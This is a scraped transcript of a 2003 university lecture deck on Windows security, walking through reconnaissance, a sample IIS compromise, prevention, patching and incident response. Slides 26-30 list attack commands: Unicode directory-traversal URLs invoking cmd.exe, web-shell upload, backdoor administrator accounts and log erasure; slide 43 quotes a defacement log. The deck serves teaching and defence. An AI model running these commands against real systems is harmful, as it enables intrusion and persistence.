1 / 52

Windows Security Analysis Computer Science E-Commerce Security ‘2003’

Windows Security Analysis Computer Science E-Commerce Security ‘2003’ Matthew Cook http://escarpment.net/. Introduction. Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/. Windows Security Analysis. Introduction

ori-rowland
Download Presentation

Windows Security Analysis Computer Science E-Commerce Security ‘2003’

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Windows Security AnalysisComputer Science E-Commerce Security ‘2003’ Matthew Cookhttp://escarpment.net/

  2. Introduction Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/

  3. Windows Security Analysis • Introduction • Step-by-step Machine Compromise • Preventing Attack • Incident Response • Further Reading

  4. Introduction Basic Security Overview

  5. Physical Security • Secure Location • BIOS restrictions • Password Protection • Boot Devices • Case Locks • Case Panels

  6. Security Threats • Denial of Service • Theft of information • Modification • Fabrication (Spoofing or Masquerading)

  7. Security Threats… Why a compromise can occur: • Physical Security Holes • Software Security Holes • Incompatible Usage Security Holes • Social Engineering • Complacency

  8. The Easiest Security Improvement • Good passwords • Usernames and Passwords are the primary security defence • Use a password that is easy to type to avoid ‘Shoulder Surfers’ • Use the first letters from song titles, song lyrics or film quotations

  9. Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier

  10. Step-by-step Machine Compromise Why, where, how?

  11. Background Reasons for Attack: • Personal Issues • Political Statement • Financial Gain (Theft of money, information) • Learning Experience • DoS (Denial of Service) • Support for Illegal Activity

  12. Gathering Information • Companies House • Internet SearchURL: http://www.google.co.uk • WhoisURL: http://www.netsol.com/cgi-bin/whois/whois • A Whois query can provide: • The Registrant • The Domain Names Registered • The Administrative, Technical and Billing Contact • Record updated and created date stamps • DNS Servers for the Domain

  13. Gathering Information… • Use Nslookup or dig • dig @<dns server> <machine address> • Different query type available: • A – Network address • Any – All or Any Information available • Mx – Mail exchange records • Soa – Zone of Authority • Hinfo – Host information • Axfr – Zone Transfer • Txt – Additional strings

  14. Identifying System Weakness Many products available: • Nmap • Nessus • Pandora • Pwdump • L0pht Crack • Null Authentication

  15. Nmap • Port Scanning Tool • Stealth scanning, OS Fingerprinting • Open Source • Runs under Unix based OS • Port development for Win32 • URL: http://www.insure.org/nmap/

  16. Nmap

  17. Nessus • Remote security scanner • Very comprehensive • Frequently updated modules • Testing of DoS attacks • Open Source • Win32 and Java Client • URL: http://nessus.org/

  18. pwdump • Version 3 (e = encrypted) • Developed by Phil Staubs and Erik Hjelmstad • Based on pwdump and pwdump2 • URL: http://www.ebiz-tech.com/html/pwdump.html • Needs Administrative Privilidges • Extracts hashs even if syskey is installed • Extract from remote machines • Identifies accounts with no password • Self contained utility

  19. L0pht Crack • Password Auditing and Recovery • Crack Passwords from many sources • Registration $249 • URL: http://www.atstake.com/research/lc3/

  20. L0pht Crack Crack Passwords from: • Local Machine • Remote Machine • SAM File • SMB Sniffer • PWDump file

  21. Nmap Analysis • nmap –sP 158.125.0.0/16 • Ping scan! • nmap –sS158.125.0.0/16 - Stealth scan

  22. Nmap Analysis… • TCP Connect Scan • Completes a ‘Three Way Handshake’ • Very noisy (Detection by IDS)

  23. Nmap Analysis… • TCP SYN Scan • Half open scanning (Full port TCP connection not made) • Less noisy than the TCP Connect Scan

  24. Nmap Analysis… • TCP FIN Scan • FIN Packet sent to target port • RST returned for all closed ports • Mostly works UNIX based TCP/IP Stacks • TCP Xmas Tree Scan • Sends a FIN, URG and PUSH packet • RST returned for all closed ports • TCP Null Scan • Turns off all flags • RST returned for all closed ports • UDP Scan • UDP Packet sent to target port • “ICMP Port Unreachable” for closed ports

  25. Null Authentication Null Authentication: • Net use \\camford\IPC$ “” /u:“” • Famous tools like ‘Red Button’ • Net view \\camford • List of Users, groups and shares • Last logged on date • Last password change • Much more…

  26. Exploiting the Security Hole • Using IIS Unicode/Directory Traversal • /scripts/../../winnt/system32/cmd.exe /c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • Displays the listing of c: in browser • Copy cmd.exe to /scripts/root.exe • Echo upload.asp • GET /scripts/root.exe /c+echo+[blah]>upload.asp • Upload cmdasp.asp using upload.asp • Still vulnerable on 24% of E-Commerce servers

  27. Gaining ‘Root’ • Cmdasp.asp provides a cmd shell in the SYSTEM context • Increase in privileges is now simple • ISAPI.dll – RevertToSelf (Horovitz) • Version 2 coded by Foundstone • http://camford/scripts/idq.dll? • Patch Bulletin: MS01-26 • NOT included in Windows 2000 SP2

  28. Backdoor Access • Create several user accounts • Net user iisservice <pass> /ADD • Net localgroup administrators iisservice /ADD • Add root shells on high end ports • Tiri is 3Kb in size • Add backdoors to ‘Run’ registry keys

  29. System Alteration • Web page alteration • Information Theft • Enable services • Add VNC • Creating a Warez Server • Net start msftpsvc • Check access • Upload file 1Mb in size • Advertise as a warez server

  30. Audit Trail Removal • Many machines have auditing disabled • Main problems are IIS logs • DoS IIS before logs sync to disc • Erase logs from hard disc • Erasing Eventlog harder • IDS Systems • Network Monitoring at firewall

  31. Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!

  32. NetBIOS/SMB Services • NetBIOS Browsing Request [UDP 137] • NetBIOS Browsing Response [UDP 138] • NetBIOS Communications [TCP 135] • CIFS [TCP 139, 445 UDP 445] • Port 445 Windows 2000 only • Block ports at firewall • Netstat -A

  33. NetBIOS/SMB Services… To disable NetBIOS • Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. • Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window

  34. NetBIOS/SMB Services… Disable Null Authentication • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous • REG_DWORD set to 0, 1 or 2! • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous • REG_DWORD set to 0 or 1

  35. Operating System Patching • Operating Systems do contain bugs, and patches are a common method of distributing these fixes. • A patch or hot fix usually contains a fix for one discovered bug. • Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows 2000.

  36. Operating System Patching… • Only install patches after you have tested them in a development environment. • Only install patches obtained direct from the vendor. • Install security patches as soon as possible after released. • Install feature patches as and when needed. • Automate patch collection and installation as much as possible (QChain).

  37. Operating System Patching… Use automated patching technology: • SUS – Microsoft Software Update Service • SMS – Microsoft Systems Management Server • Ghost – Symantec imaging software. And other application deployment software: • Lights out Distribution • Deferred installation

  38. Baseline Security Analyzer • Freely available from Microsoft • Written by Shavlik Technologies as a direct result of Code Red attacks • A GUI to HFNetChk (v3.81) • Improved feature set • Integrated SUS functionality

  39. Baseline Security Analyzer… MBSA v1.1 supports the following host OS: • Windows 2000 Professional / Server • Windows XP Home / Professional • Windows .NET not officially supported • Windows NT not supported as host OS • Remote scanning available

  40. Baseline Security Analyzer… What applications does MBSA scan? • Operating system • Internet Explorer > 5.01 • Microsoft Office 2000 and 2002 • Media Player > 6.4 • Internet Information Services 4.0 and 5.0 • SQL Server 7.0 and 2000 • Exchange Server 5.5 and 2000

  41. IPSec • IP security • Linux Connectivity using FreeS/WAN • Mainly for wireless use • WEP encryption cracked • URL: http://www.freeswan.org/ • URL: http://airsnort.sourceforge.net/

  42. Recent Worms • Sadmind/IISDirectory Traversal (Unicode Exploit) • CodeRedida/idq buffer overflow • CodeGreen ida/idq buffer overflow • NimdaDirectory Traversal (Unicode Exploit) • SlammerMS SQL Server transaction control

  43. Sadmind/IIS • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -

  44. IDS Snort • IDS – Intrusion Detection System • Libpcap packet sniffer and logger • Originally developed for the Unix platforms • Open Source • Port to Win32 available (Release 1.8.1) • Installation on Win32 in under 30 minutes • Run on your IIS server or standalone

  45. IDS Snort… Snort can detect: • Stealth Port Scans • CGI Attacks • Front Page Extensions Attacks • ICMP Activity • SMTP Activity • SQL Activity • SMB Probes

  46. Incident Response What to do when something does go wrong!

  47. Incident Response… • Don’t Panic! • Unplug the network • Get a notebook • Back-up the system and keep the Back-ups • Restrict use of email • Look for information • Investigate the cause • Request help and assistance.

  48. Incident Response… • Important to return to service swiftly • Do not jeopardize security • If in doubt, re-build • Perform forensics on a backup • Keep documentation and evidence • Contact local CERT if investigation proves non worm/script kiddie activity.

  49. Further Reading • Garfinkel, S. Web Security & CommerceO’Reilly [ISBN 1-56592-269-7] • Hassler, V. Security Fundamentals for E-Commerce Artech House [ISBN 1-58053-108-3] • Huth, M R A. Secure Communicating Systems Cambridge Uni Press [ISBN 0-52180-731-X] • Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]

  50. Useful Books, Tools and URLs • Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) • Incident Response. (Kenneth R. van Wyk, Richard Forno.) • Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) • Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)

More Related